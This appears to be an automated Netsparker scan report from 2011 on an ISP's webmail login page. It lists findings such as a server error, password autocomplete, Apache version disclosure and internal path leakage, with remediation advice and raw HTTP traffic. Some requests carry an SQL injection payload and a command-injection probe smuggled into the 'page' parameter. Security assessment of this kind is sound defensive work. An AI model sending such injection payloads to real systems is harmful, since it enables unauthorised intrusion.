align="center"> <table width="400"> <tr> <!-- <td> If your email address ends in <b>@gis.net</b>, you can login using just your username (the part of your email address before the @ sign), or your full email address. For all other email accounts, please login using your full email address.<br /><br /> </td> --> </tr> <tr> <td> <ul> <!-- <li><a href="/images/loginpopup.html" target="PopupHelp" onClick="popupPage();"><b>Login Help</b></a> including information on<br /> AstroMail Account Activation</li> --> <li><a href="/cgi-bin/astromail.cgi?page=help">AstroMail User's Guide</a></li> </ul> </td> </tr> </table> </td></tr></table></table></center></form></body></html>
Internal Server Error
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
Parameters
Parameter
Type
Value
page
GET
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
Request
GET /cgi-bin/astromail.cgi?page=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Response
HTTP/1.1 500 Internal Server Error
Date: Thu, 21 Apr 2011 23:53:55 GMT
Server: Apache/2.0.52 (Unix)
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Server error!</TITLE><LINK REV="made" HREF="mailto:root@thecia.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Server error!</H1><DL><DD> </DL><DL><DD> Error message: <BR>Premature end of script headers: astromail.cgi </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@thecia.net">webmaster</A></DL><H2>Error 500</H2><DL><DD><ADDRESS> <A HREF="/">astromail.gis.net</A> <BR> <small>Thu Apr 21 19:53:55 2011</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
Auto Complete Enabled
Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
Actions to Take
See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
pass
Request
GET /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:53:42 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net,webmail_cookie=works; expires="Sun, 22-May-2011 23:53:42 GMT"; domain=astromail.gis.net
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<html><head><!--ns: ie:6.0--><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Pragma" CONTENT="no-cache" /><meta http-equiv="cache-control" CONTENT="no-cache" /><meta http-equiv="Expires" CONTENT="-1" /><style type="text/css"><!--body{ font: 9pt "Arial"; color: black;}td{ font: 9pt "Arial"; color: black;}td.webmail{ font: 24pt "Arial"; color: black; font-weight: "bold";}td.login{ font: 15pt "Arial"; color: black; font-weight: "bold";}td.title{ font: 13pt "Arial"; color: black; font-weight: "bold";}th{ font: 9pt "Arial"; color: black;}A{ font: 9pt "Arial"; color: black;}//--></style><script type="text/javascript"><!--function fixLogin(){ var user_or_email = document.loginform.user_or_email.value; var at = user_or_email.indexOf("@"); if (at > 0) { var domain = new String(user_or_email.substring(at+1)); domain = domain.toLowerCase(); if (domain == "gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.gis.net"; return true; } else if (domain == "mail2.gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "mail2.gis.net"; return true; } else if (domain == "eecprovider.org") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.eec.gis.net"; return true; } } document.loginform.user.value = user_or_email; document.loginform.host.value = "pop.gis.net"; return true;}function popupPage() { var windowprops = "height=475,width=425,location=no,menubar=yes,toolbars=no,resizable=no"; window.open("http://www.gis.net/dialup/loading.html", "PopupHelp", windowprops);}//--></script><title>AstroMail - Galaxy Internet Services</title></head><body onLoad="window.focus();document.loginform.user_or_email.focus();"><form action="/cgi-bin/astromail.cgi" method="post" name="loginform" onSubmit="fixLogin();"><input type="hidden" name="cmd" value="quick_login" /><input type="hidden" name="tcode" value="7-16881072524" /><input type="hidden" name="user" value="" /><input type="hidden" name="host" value="pop.gis.net" /><input type="hidden" name="force_connection" value="true" /><input type="hidden" name="frames" value="true" /><input type="hidden" name="email" value="" /><center><table cellpadding=0 cellspacing=0 border=0 width=492><td bgcolor="#EEEEDD"><img src="/images/toplogo.jpg" /><table cellpadding=10 cellspacing=0 border=0 width=492><tr> <td align="center" colspan="2" class="title"><font size="3" style="font-weight:bold;">Welcome to AstroMail!</font></td></tr><tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Members:</font></td></tr><tr> <td align="center" colspan="2"> <table width="330"> <tr> <td nowrap="true"><font style="font-weight:bold;">Username / Email: </font></td> <td nowrap="true"><input type="text" size="30" maxlength="255" name="user_or_email" tabindex="1" value="" /></td> <td align="center" rowspan="2"> <input type="image" src="/images/login.gif" alt="Login" name="quick_login" tabindex="4" /><br /> <font style="font-weight:bold;">Login</font> </td> </tr> <tr> <td nowrap="true"><font style="font-weight:bold;">Password: </font></td> <td nowrap="true"><input type="password" size="30" maxlength="255" name="pass" tabindex="2" value="" /></td> </tr> <tr> <td nowrap="true" colspan="2"> <font style="font-weight:bold;">Remember Login: </font> <input type="checkbox" name="set_cookie" value="ON" /> </td> </tr> </table> </td></tr> <tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Help:</font></td></tr><tr> <td colspan="2" align="center"> <table width="400"> <tr> <!-- <td> If your email address ends in <b>@gis.net</b>, you can login using just your username (the part of your email address before the @ sign), or your full email address. For all other email accounts, please login using your full email address.<br /><br /> </td> --> </tr> <tr> <td> <ul> <!-- <li><a href="/images/loginpopup.html" target="PopupHelp" onClick="popupPage();"><b>Login Help</b></a> including information on<br /> AstroMail Account Activation</li> --> <li><a href="/cgi-bin/astromail.cgi?page=help">AstroMail User's Guide</a></li> </ul> </td> </tr> </table> </td></tr></table></table></center></form></body></html>
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
2.0.52 (Unix)
Request
GET /cgi-bin/astromail.cgi HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:53:42 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net,webmail_cookie=works; expires="Sun, 22-May-2011 23:53:42 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<html><head><!--ns: ie:6.0--><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Pragma" CONTENT="no-cache" /><meta http-equiv="cache-control" CONTENT="no-cache" /><meta http-equiv="Expires" CONTENT="-1" /><style type="text/css"><!--body{ font: 9pt "Arial"; color: black;}td{ font: 9pt "Arial"; color: black;}td.webmail{ font: 24pt "Arial"; color: black; font-weight: "bold";}td.login{ font: 15pt "Arial"; color: black; font-weight: "bold";}td.title{ font: 13pt "Arial"; color: black; font-weight: "bold";}th{ font: 9pt "Arial"; color: black;}A{ font: 9pt "Arial"; color: black;}//--></style><script type="text/javascript"><!--function fixLogin(){ var user_or_email = document.loginform.user_or_email.value; var at = user_or_email.indexOf("@"); if (at > 0) { var domain = new String(user_or_email.substring(at+1)); domain = domain.toLowerCase(); if (domain == "gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.gis.net"; return true; } else if (domain == "mail2.gis.net") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "mail2.gis.net"; return true; } else if (domain == "eecprovider.org") { document.loginform.user.value = user_or_email.substring(0, at); document.loginform.host.value = "pop.eec.gis.net"; return true; } } document.loginform.user.value = user_or_email; document.loginform.host.value = "pop.gis.net"; return true;}function popupPage() { var windowprops = "height=475,width=425,location=no,menubar=yes,toolbars=no,resizable=no"; window.open("http://www.gis.net/dialup/loading.html", "PopupHelp", windowprops);}//--></script><title>AstroMail - Galaxy Internet Services</title></head><body onLoad="window.focus();document.loginform.user_or_email.focus();"><form action="/cgi-bin/astromail.cgi" method="post" name="loginform" onSubmit="fixLogin();"><input type="hidden" name="cmd" value="quick_login" /><input type="hidden" name="tcode" value="7-16881072524" /><input type="hidden" name="user" value="" /><input type="hidden" name="host" value="pop.gis.net" /><input type="hidden" name="force_connection" value="true" /><input type="hidden" name="frames" value="true" /><input type="hidden" name="email" value="" /><center><table cellpadding=0 cellspacing=0 border=0 width=492><td bgcolor="#EEEEDD"><img src="/images/toplogo.jpg" /><table cellpadding=10 cellspacing=0 border=0 width=492><tr> <td align="center" colspan="2" class="title"><font size="3" style="font-weight:bold;">Welcome to AstroMail!</font></td></tr><tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Members:</font></td></tr><tr> <td align="center" colspan="2"> <table width="330"> <tr> <td nowrap="true"><font style="font-weight:bold;">Username / Email: </font></td> <td nowrap="true"><input type="text" size="30" maxlength="255" name="user_or_email" tabindex="1" value="" /></td> <td align="center" rowspan="2"> <input type="image" src="/images/login.gif" alt="Login" name="quick_login" tabindex="4" /><br /> <font style="font-weight:bold;">Login</font> </td> </tr> <tr> <td nowrap="true"><font style="font-weight:bold;">Password: </font></td> <td nowrap="true"><input type="password" size="30" maxlength="255" name="pass" tabindex="2" value="" /></td> </tr> <tr> <td nowrap="true" colspan="2"> <font style="font-weight:bold;">Remember Login: </font> <input type="checkbox" name="set_cookie" value="ON" /> </td> </tr> </table> </td></tr> <tr> <td colspan="2" class="title"><font size="3" style="font-weight:bold;">Help:</font></td></tr><tr> <td colspan="2" align="center"> <table width="400"> <tr> <!-- <td> If your email address ends in <b>@gis.net</b>, you can login using just your username (the part of your email address before the @ sign), or your full email address. For all other email accounts, please login using your full email address.<br /><br /> </td> --> </tr> <tr> <td> <ul> <!-- <li><a href="/images/loginpopup.html" target="PopupHelp" onClick="popupPage();"><b>Login Help</b></a> including information on<br /> AstroMail Account Activation</li> --> <li><a href="/cgi-bin/astromail.cgi?page=help">AstroMail User's Guide</a></li> </ul> </td> </tr> </table> </td></tr></table></table></center></form></body></html>
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
Request
GET /cgi-bin/ HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Date: Thu, 21 Apr 2011 23:53:42 GMT
Server: Apache/2.0.52 (Unix)
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@thecia.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested directory. There is either no index document or the directory is read-protected. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@thecia.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">astromail.gis.net</A> <BR> <small>Thu Apr 21 19:53:42 2011</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
root@thecia.net
Request
GET /cgi-bin/ HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Date: Thu, 21 Apr 2011 23:53:42 GMT
Server: Apache/2.0.52 (Unix)
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@thecia.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested directory. There is either no index document or the directory is read-protected. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@thecia.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">astromail.gis.net</A> <BR> <small>Thu Apr 21 19:53:42 2011</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Error messages should be disabled.
Remove this kind of private data from the output.
External References
/var/spool/webmail/templates/
Request
GET /cgi-bin/astromail.cgi?page=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 23:53:54 GMT
Server: Apache/2.0.52 (Unix)
Set-Cookie: webmail_key=; expires="Wed, 31-Dec-1969 19:00:00 GMT"; domain=astromail.gis.net,webmail_cookie=works; expires="Sun, 22-May-2011 23:53:54 GMT"; domain=astromail.gis.net
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1
<html><head> <title>TPL Error</title></head><body><p><h1>Unexpected Error Occurred</h1></p><p>Failed to Locate Template {/var/spool/webmail/templates/"& SET /A 0xFFF9999-2 &.tpl}Failed to Locate Template {/var/spool/webmail/templates/"& SET /A 0xFFF9999-2 &.tpl}Failed to Locate Template {/var/spool/webmail/templates/"& SET /error.tpl}Expected Template ini Setting Incorrect</p></body></html>
